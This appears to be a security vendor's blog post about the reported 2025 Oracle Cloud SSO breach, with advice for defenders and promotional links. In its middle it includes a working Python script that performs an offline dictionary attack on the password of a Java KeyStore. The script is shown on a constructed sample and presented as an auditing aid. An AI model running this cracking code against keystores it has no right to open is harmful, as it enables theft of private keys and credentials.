
The breach reportedly affects over 140,000 Oracle tenants, raising critical concerns about trust and security in modern cloud-based supply chains.
Introduction
On March 21, 2025, CloudSEK’s XVigil platform discovered that a threat actor using the alias “rose87168” was offering 6 million exfiltrated records for sale, allegedly stolen from Oracle Cloud’s SSO and LDAP systems. This supply chain breach has impacted over 140,000 tenants, triggering urgent questions about the security posture of cloud service providers and the organizations that rely on them.
What Happened
The attacker reportedly gained unauthorized access to the subdomain login.us2.oraclecloud.com, which hosted Oracle Fusion Middleware 11g. The vulnerability most likely exploited is CVE-2021-35587, a critical (CVSS 9.8) flaw in Oracle Access Manager that lets an unauthenticated attacker with HTTP access take over the OAM server. Oracle patched it in 2022 and CISA lists it in its Known Exploited Vulnerabilities catalog, so a production SSO endpoint still exposed to it in 2025 points to a years-old patching gap rather than a novel attack.
What was stolen, according to the seller's listing and CloudSEK's analysis:
- .jks files (Java KeyStores) and encrypted SSO credentials
- Private key files (ewallet.p12, cwallet.sso)
- LDAP and identity configurations
- Enterprise Manager's JPS (Java Platform Security) and credential vault content
The seller also offered rewards to anyone who could help crack the passwords protecting this material, a sign that the offline cracking of the stolen keystores and hashes was already being crowdsourced in the underground.
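One reason the list above matters is that the store password on a .jks file is not an encryption key at all: it only keys an unsalted, single-round SHA-1 integrity digest appended to the file, so anyone holding the file can test password guesses offline at hash speed, with no lockout and no log entry on the victim's side. The Python script below is an added example written for this article, not code from CloudSEK, Hudson Rock or the leaked material. It builds a constructed zero-entry JKS file laid out the way keytool writes one (magic, version, entry count, then the digest), verifies it with the correct password, and then runs a constructed wordlist against it. The private-key entries inside a real JKS carry their own password protection built on a similar SHA-1 construction, which is why the only sound response to a stolen keystore is to revoke and reissue every key and certificate in it rather than to hope the passwords hold.

```python
"""
Why a stolen .jks is effectively compromised: the JKS store-password check.

A Java KeyStore (JKS) ends with a 20-byte SHA-1 digest computed as
    SHA1( store_password as UTF-16BE + "Mighty Aphrodite" + all preceding file bytes )
There is no salt and no iteration count, so one guess costs one SHA-1.
Added example for this article; the keystore and wordlist below are constructed.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional, Tuple

JKS_MAGIC = 0xFEEDFEED
JKS_VERSION = 2
# Fixed string from sun.security.provider.JavaKeyStore, mixed into the digest.
JKS_DIGEST_SUFFIX = b"Mighty Aphrodite"
DIGEST_LEN = 20  # SHA-1 output size


def _keyed_digest(password: str, body: bytes) -> bytes:
    """SHA-1 over the password (UTF-16BE), the fixed suffix and the store body."""
    h = hashlib.sha1()
    h.update(password.encode("utf-16-be"))
    h.update(JKS_DIGEST_SUFFIX)
    h.update(body)
    return h.digest()


def build_empty_jks(store_password: str) -> bytes:
    """Constructed sample: a JKS with zero entries, as keytool would lay it out.
    Header is magic, version and entry count as big-endian 32-bit ints."""
    body = struct.pack(">III", JKS_MAGIC, JKS_VERSION, 0)
    return body + _keyed_digest(store_password, body)


def split_jks(blob: bytes) -> Tuple[bytes, bytes]:
    """Sanity-check the header and split the file into (body, trailing digest)."""
    if len(blob) < 12 + DIGEST_LEN:
        raise ValueError("too short to be a JKS file")
    magic, version, _count = struct.unpack(">III", blob[:12])
    if magic != JKS_MAGIC:
        raise ValueError(f"not a JKS file (magic {magic:#x})")
    if version not in (1, 2):
        raise ValueError(f"unsupported JKS version {version}")
    return blob[:-DIGEST_LEN], blob[-DIGEST_LEN:]


def verify_store_password(blob: bytes, password: str) -> bool:
    """What `keytool -list -storepass` does: recompute the digest and compare."""
    body, digest = split_jks(blob)
    return hmac.compare_digest(_keyed_digest(password, body), digest)


def crack_store_password(blob: bytes, wordlist: Iterable[str]) -> Tuple[Optional[str], int]:
    """Offline dictionary attack: one SHA-1 per guess, no rate limit, no lockout.
    Returns (recovered password or None, number of guesses tried)."""
    body, digest = split_jks(blob)
    tried = 0
    for guess in wordlist:
        tried += 1
        if _keyed_digest(guess, body) == digest:
            return guess, tried
    return None, tried


# Constructed wordlist: defaults commonly left on Java/Oracle deployments, plus filler.
SAMPLE_WORDLIST = ["password", "welcome1", "oracle", "changeit", "keystore", "Oracle123"]

if __name__ == "__main__":
    ks = build_empty_jks("changeit")  # "changeit" is the JDK default store password
    print("correct password verifies:", verify_store_password(ks, "changeit"))
    found, n = crack_store_password(ks, SAMPLE_WORDLIST)
    print(f"recovered store password {found!r} after {n} guesses")
```

To audit one of your own keystores, replace the call to build_empty_jks with the bytes of the file (open(path, "rb").read()) and feed crack_store_password a real wordlist; if a default such as changeit or welcome1 still guards material that matters, treat that keystore as readable by anyone who obtains the file.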
Oracle’s Response vs. Independent Findings
Oracle denied any breach. According to their statement:
“There has been no breach in Oracle Cloud. The credentials posted do not match Oracle Cloud infrastructure or customer data.”
However, CloudSEK and Hudson Rock independently examined samples of the leaked data and the proof the actor supplied, including a text file the actor had placed on the login.us2.oraclecloud.com server that was captured by the Internet Archive, and both concluded that the material appears genuine and tied to production systems. These findings strongly suggest that the breach was real, even if Oracle was unwilling to confirm it publicly.
5 Critical Lessons for Security Teams
1. Audit Your Vendors Regularly
Relying on third-party cloud providers? Then you must conduct ongoing risk assessments. Verify certifications like SOC 2, ISO 27001, and require clear incident response plans.
2. Enforce Strong Identity Controls
Enable Multi-Factor Authentication (MFA) across all accounts, especially those accessing cloud infrastructure, and prefer phishing-resistant methods such as FIDO2 keys over SMS or push prompts. MFA blunts the replay of leaked passwords, but note the limit this incident exposes: if an identity provider's signing keys or keystores are stolen, an attacker can mint valid sessions without ever touching a login prompt, so stolen key material has to be rotated, not just guarded by MFA.
3. Monitor Continuously
Use SIEM, EDR, and threat intelligence platforms to detect abnormal activity in real-time. Early detection = faster containment.
4. Segment Your Cloud Access
Apply least privilege principles and network segmentation. Prevent lateral movement between accounts, services, and environments.
5. Prepare a Breach Response Playbook
When a breach happens, speed and coordination are everything. Have a documented IR plan, defined roles, and communication strategy in place.
Final Thoughts
The Oracle Cloud breach of 2025 is a stark reminder that cloud doesn’t mean secure by default. Even industry giants can fall victim to vulnerabilities — often cascading to hundreds of thousands of customers.
At Krixo.io, we help organizations protect their digital supply chains through advanced risk assessments, real-time monitoring, and cloud security consulting.
Free evaluation
Find out if your domain has been compromised and receive a detailed report so you can take immediate action.
✅ Is Your Business Secure?
🔐 Request a Free Security Risk Assessment from Krixo.io
👉 https://krixo.io/contact
📘 Free Download: “10 Steps to Secure Your Cloud Supply Chain”
👉 https://krixo.io/ebook-supplychain-security
📬 Subscribe to Our Threat Intelligence Briefing
👉 https://krixo.io/newsletter
🔎 Related Reading
🧠 How to Mitigate Third-Party Cloud Risks